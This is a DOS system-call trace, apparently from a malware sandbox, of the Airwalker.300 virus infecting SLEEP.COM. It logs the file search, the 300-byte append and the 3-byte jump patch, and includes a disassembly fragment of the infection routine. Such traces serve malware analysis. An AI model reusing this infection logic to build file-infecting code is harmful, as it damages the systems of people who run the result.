Time Syscall Op Syscall Name
2018-12-17T22:24:27.071625834Z 26 PC: 12aa0 | Set disk transfer address
2018-12-17T22:24:27.074908187Z 78 PC: 12aac | Find first file
2018-12-17T22:24:27.080760306Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:27.087589446Z 63 PC: 12acd | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:27.094653687Z 66 PC: 12ae0 | Move file pointer
2018-12-17T22:24:27.096988798Z 44 PC: 12aed | Get time
0x12aed: xchg ch, cl
0x12aef: add dx, cx
0x12af1: mov word ptr [bp + 0x11c], dx
0x12af5: mov ah, 0x40
0x12af7: mov cx, 0x12c
0x12afa: mov dx, bp
0x12afc: pushaw
0x12afd: jmp 0x12ba4
0x12b00: pop ax
0x12b01: jb 0x12aae
0x12b03: sub ax, 3
0x12b06: push bx
0x12b07: mov bx, bp
0x12b09: mov word ptr cs:[bx + 1], ax
0x12b0d: mov byte ptr [bx], 0xe9
0x12b10: pop bx
0x12b11: mov ax, 0x4200
0x12b14: xor cx, cx
0x12b16: cdq
0x12b17: int 0x21
2018-12-17T22:24:27.099542685Z 64 PC: 12baa | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:24:27.115801025Z 66 PC: 12b19 | Move file pointer
2018-12-17T22:24:27.118149604Z 64 PC: 12b25 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:27.124609457Z 62 PC: 12b2b | Close file
2018-12-17T22:24:27.132628792Z 9 PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.300 virus! ')